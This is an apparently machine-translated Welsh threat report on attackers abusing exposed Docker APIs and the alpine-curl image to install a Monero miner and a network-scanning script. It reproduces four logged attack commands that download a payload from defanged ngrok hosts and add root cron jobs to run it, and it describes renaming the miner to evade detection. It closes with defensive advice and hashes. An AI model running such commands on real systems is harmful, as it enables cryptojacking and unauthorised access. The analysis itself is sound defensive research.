Gwnaethom ddadansoddi'r data a gasglwyd gan ddefnyddio cynwysyddion pot mêl, a grëwyd gennym i olrhain bygythiadau. A gwnaethom ganfod gweithgarwch sylweddol gan lowyr arian cyfred digidol diangen neu anawdurdodedig a ddefnyddir fel cynwysyddion twyllodrus gan ddefnyddio delwedd a gyhoeddwyd gan y gymuned ar Docker Hub. Defnyddir y ddelwedd fel rhan o wasanaeth sy'n darparu glowyr arian cyfred digidol maleisus.
Yn ogystal, mae rhaglenni ar gyfer gweithio gyda rhwydweithiau yn cael eu gosod i dreiddio i gynwysyddion a chymwysiadau cyfagos agored.
Rydym yn gadael ein potiau mêl fel y mae, hynny yw, gyda gosodiadau diofyn, heb unrhyw fesurau diogelwch na gosod meddalwedd ychwanegol wedi hynny. Sylwch fod gan Docker argymhellion ar gyfer gosodiad cychwynnol i osgoi gwallau a gwendidau syml. Ond mae'r potiau mêl a ddefnyddir yn gynwysyddion, wedi'u cynllunio i ganfod ymosodiadau sydd wedi'u hanelu at y llwyfan cynhwysyddion, nid y cymwysiadau y tu mewn i'r cynwysyddion.
Mae'r gweithgaredd maleisus a ganfuwyd hefyd yn nodedig oherwydd nad oes angen gwendidau ac mae hefyd yn annibynnol ar fersiwn Docker. Dod o hyd i ddelwedd cynhwysydd sydd wedi'i ffurfweddu'n anghywir, ac felly'n agored, yw'r cyfan sydd ei angen ar ymosodwyr i heintio llawer o weinyddion agored.
Mae'r API Docker heb ei gau yn caniatáu i'r defnyddiwr berfformio ystod eang o , gan gynnwys cael rhestr o gynwysyddion rhedeg, cael logiau o gynhwysydd penodol, cychwyn, stopio (gan gynnwys gorfodi) a hyd yn oed greu cynhwysydd newydd o ddelwedd benodol gyda gosodiadau penodedig.
Ar y chwith mae'r dull cyflwyno malware. Ar y dde mae amgylchedd yr ymosodwr, sy'n caniatáu ar gyfer cyflwyno delweddau o bell.
Dosbarthiad yn ôl gwlad o 3762 API Docker agored. Yn seiliedig ar chwiliad Shodan dyddiedig 12.02.2019/XNUMX/XNUMX
Opsiynau cadwyn ymosod a llwyth tâl
Canfuwyd gweithgaredd maleisus nid yn unig gyda chymorth potiau mêl. Mae data o Shodan yn dangos bod nifer yr APIs Docker agored (gweler yr ail graff) wedi cynyddu ers i ni ymchwilio i gynhwysydd wedi'i gamgyflunio a ddefnyddir fel pont i ddefnyddio meddalwedd mwyngloddio arian cyfred digidol Monero. Ym mis Hydref y llynedd (2018, data cyfredol tua. cyfieithydd) dim ond 856 API agored oedd.
Dangosodd archwiliad o'r boncyffion pot mêl fod defnydd delwedd cynhwysydd hefyd yn gysylltiedig â'r defnydd o , offeryn ar gyfer sefydlu cysylltiadau diogel neu anfon traffig ymlaen o fannau sy'n hygyrch i'r cyhoedd i gyfeiriadau neu adnoddau penodedig (er enghraifft localhost). Mae hyn yn caniatáu i ymosodwyr greu URLau yn ddeinamig wrth gyflwyno llwyth tâl i weinydd agored. Isod mae enghreifftiau cod o'r logiau sy'n dangos camddefnydd o'r gwasanaeth ngrok:
Tty: false
Command: “-c curl –retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”,
Tty: false,
Cmd: “-c curl –retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c ”cron || crond””,
Entrypoint: “/bin/sh”Fel y gallwch weld, mae'r ffeiliau sydd wedi'u llwytho i fyny yn cael eu llwytho i lawr o URLau sy'n newid yn gyson. Mae gan yr URLau hyn ddyddiad dod i ben byr, felly ni ellir lawrlwytho llwythi tâl ar ôl y dyddiad dod i ben.
Mae dau opsiwn llwyth tâl. Y cyntaf yw glöwr ELF a luniwyd ar gyfer Linux (a ddiffinnir fel Coinminer.SH.MALXMR.ATNO) sy'n cysylltu â'r pwll mwyngloddio. Mae'r ail yn sgript (TrojanSpy.SH.ZNETMAP.A) a gynlluniwyd i gael rhai offer rhwydwaith a ddefnyddir i sganio ystodau rhwydwaith ac yna chwilio am dargedau newydd.
Mae'r sgript dropper yn gosod dau newidyn, a ddefnyddir wedyn i ddefnyddio'r glöwr cryptocurrency. Mae'r newidyn HOST yn cynnwys yr URL lle mae'r ffeiliau maleisus wedi'u lleoli, a'r newidyn RIP yw enw ffeil (mewn gwirionedd, yr hash) y glöwr i'w ddefnyddio. Mae'r newidyn HOST yn newid bob tro mae'r newidyn hash yn newid. Mae'r sgript hefyd yn ceisio gwirio nad oes unrhyw glowyr cryptocurrency eraill yn rhedeg ar y gweinydd yr ymosodwyd arno.
Enghreifftiau o newidynnau HOST a RIP, yn ogystal â thalp cod a ddefnyddir i wirio nad oes unrhyw lowyr eraill yn rhedeg
Cyn dechrau'r glöwr, caiff ei ailenwi i nginx. Mae fersiynau eraill o'r sgript hon yn ailenwi'r glöwr i wasanaethau cyfreithlon eraill a allai fod yn bresennol mewn amgylcheddau Linux. Mae hyn fel arfer yn ddigon i osgoi gwiriadau yn erbyn y rhestr o brosesau rhedeg.
Mae gan y sgript chwilio nodweddion hefyd. Mae'n gweithio gyda'r un gwasanaeth URL i ddefnyddio'r offer angenrheidiol. Yn eu plith mae'r deuaidd zmap, a ddefnyddir i sganio rhwydweithiau a chael rhestr o borthladdoedd agored. Mae'r sgript hefyd yn llwytho deuaidd arall a ddefnyddir i ryngweithio â'r gwasanaethau a ddarganfuwyd a derbyn baneri ganddynt i bennu gwybodaeth ychwanegol am y gwasanaeth a ddarganfuwyd (er enghraifft, ei fersiwn).
Mae'r sgript hefyd yn rhag-bennu rhai ystodau rhwydwaith i'w sganio, ond mae hyn yn dibynnu ar fersiwn y sgript. Mae hefyd yn gosod y porthladdoedd targed o'r gwasanaethau - yn yr achos hwn, Docker - cyn rhedeg y sgan.
Cyn gynted ag y darganfyddir targedau posibl, caiff baneri eu tynnu oddi arnynt yn awtomatig. Mae'r sgript hefyd yn hidlo targedau yn dibynnu ar y gwasanaethau, cymwysiadau, cydrannau neu lwyfannau o ddiddordeb: Redis, Jenkins, Drupal, MODX, , cleient Docker 1.16 ac Apache CouchDB. Os yw'r gweinydd wedi'i sganio yn cyfateb i unrhyw un ohonynt, caiff ei gadw mewn ffeil testun, y gall ymosodwyr ei ddefnyddio'n ddiweddarach ar gyfer dadansoddi a hacio dilynol. Mae'r ffeiliau testun hyn yn cael eu huwchlwytho i weinyddion yr ymosodwyr trwy ddolenni deinamig. Hynny yw, defnyddir URL ar wahân ar gyfer pob ffeil, sy'n golygu bod mynediad dilynol yn anodd.
Mae'r fector ymosodiad yn ddelwedd Dociwr, fel y gwelir yn y ddau ddarn nesaf o god.
Ar y brig mae ailenwi i wasanaeth cyfreithlon, ac ar y gwaelod mae sut mae zmap yn cael ei ddefnyddio i sganio rhwydweithiau
Ar y brig mae ystodau rhwydwaith wedi'u diffinio ymlaen llaw, ar y gwaelod mae porthladdoedd penodol ar gyfer chwilio am wasanaethau, gan gynnwys Docker
Mae'r sgrinlun yn dangos bod y ddelwedd alpaidd-curl wedi'i lawrlwytho fwy na 10 miliwn o weithiau
Yn seiliedig ar Alpine Linux a Curl, offeryn CLI sy'n effeithlon o ran adnoddau ar gyfer trosglwyddo ffeiliau dros wahanol brotocolau, gallwch adeiladu . Fel y gwelwch yn y ddelwedd flaenorol, mae'r ddelwedd hon eisoes wedi'i lawrlwytho fwy na 10 miliwn o weithiau. Gall nifer fawr o lawrlwythiadau olygu defnyddio'r ddelwedd hon fel pwynt mynediad; diweddarwyd y ddelwedd hon fwy na chwe mis yn ôl; ni wnaeth defnyddwyr lawrlwytho delweddau eraill o'r gadwrfa hon mor aml. Yn Docker - set o gyfarwyddiadau a ddefnyddir i ffurfweddu cynhwysydd i'w redeg. Os yw gosodiadau'r pwynt mynediad yn anghywir (er enghraifft, mae'r cynhwysydd yn cael ei adael ar agor o'r Rhyngrwyd), gellir defnyddio'r ddelwedd fel fector ymosodiad. Gall ymosodwyr ei ddefnyddio i ddosbarthu llwyth tâl os ydyn nhw'n dod o hyd i gynhwysydd sydd wedi'i gamgyflunio neu'n agored wedi'i adael heb ei gynnal.
Mae'n bwysig nodi nad yw'r ddelwedd hon (cwrl alpaidd) ei hun yn faleisus, ond fel y gwelwch uchod, gellir ei ddefnyddio i gyflawni swyddogaethau maleisus. Gellir defnyddio delweddau Docker tebyg hefyd i berfformio gweithgareddau maleisus. Fe wnaethom gysylltu â Docker a gweithio gyda nhw ar y mater hwn.
Argymhellion
olion i lawer o gwmnïau, yn enwedig y rhai sy'n gweithredu , yn canolbwyntio ar ddatblygiad cyflym a chyflwyno. Mae popeth yn cael ei waethygu gan yr angen i gydymffurfio â rheolau archwilio a monitro, yr angen i fonitro cyfrinachedd data, yn ogystal â'r difrod enfawr o'u diffyg cydymffurfio. Mae ymgorffori awtomeiddio diogelwch yn y cylch bywyd datblygu nid yn unig yn eich helpu i ddod o hyd i dyllau diogelwch a allai fynd heb eu canfod fel arall, ond mae hefyd yn eich helpu i leihau llwyth gwaith diangen, megis rhedeg meddalwedd ychwanegol ar gyfer pob bregusrwydd neu gamgyfluniad a ddarganfyddir ar ôl i gais gael ei ddefnyddio.
Mae'r digwyddiad a drafodir yn yr erthygl hon yn tynnu sylw at yr angen i gymryd diogelwch i ystyriaeth o'r cychwyn, gan gynnwys yr argymhellion canlynol:
- Ar gyfer gweinyddwyr system a datblygwyr: Gwiriwch eich gosodiadau API bob amser i wneud yn siŵr bod popeth wedi'i ffurfweddu i dderbyn ceisiadau gan weinyddwr neu rwydwaith mewnol penodol yn unig.
- Dilynwch yr egwyddor o hawliau lleiaf: sicrhewch fod delweddau cynhwysydd yn cael eu harwyddo a'u gwirio, cyfyngu mynediad i gydrannau hanfodol (gwasanaeth lansio cynhwysydd) ac ychwanegu amgryptio i gysylltiadau rhwydwaith.
- Dilynwch a galluogi mecanweithiau diogelwch, e.e. ac adeiledig .
- Defnyddio sganio awtomataidd o amseroedd rhedeg a delweddau i gael gwybodaeth ychwanegol am y prosesau sy'n rhedeg yn y cynhwysydd (er enghraifft, i ganfod ffugio neu chwilio am wendidau). Mae rheoli cymwysiadau a monitro cywirdeb yn helpu i olrhain newidiadau annormal i weinyddion, ffeiliau a meysydd system.
Mae Trendmicro yn helpu timau DevOps i adeiladu'n ddiogel, eu cyflwyno'n gyflym, a lansio unrhyw le. Tuedd Micro Yn darparu diogelwch pwerus, symlach ac awtomataidd ar draws piblinell DevOps sefydliad ac yn darparu amddiffyniadau bygythiad lluosog i amddiffyn llwythi gwaith corfforol, rhithwir a chymylau ar amser rhedeg. Mae hefyd yn ychwanegu diogelwch cynhwysydd gyda и , sy'n sganio delweddau cynhwysydd Docker am malware a gwendidau ar unrhyw adeg yn yr arfaeth datblygu i atal bygythiadau cyn iddynt gael eu defnyddio.
Arwyddion o gyfaddawd
hashes cysylltiedig:
- 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
- f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)
Ar Mae siaradwyr sy'n ymarfer yn dangos pa osodiadau sydd angen eu gwneud yn gyntaf er mwyn lleihau'r tebygolrwydd neu osgoi'r sefyllfa a ddisgrifir uchod yn llwyr. Ac ar Awst 19-21 mewn sesiwn ddwys ar-lein Gallwch drafod y rhain a phroblemau diogelwch tebyg gyda chydweithwyr ac athrawon wrth eu gwaith wrth fwrdd crwn, lle gall pawb siarad a gwrando ar boenau a llwyddiannau cydweithwyr profiadol.
Ffynhonnell: hab.com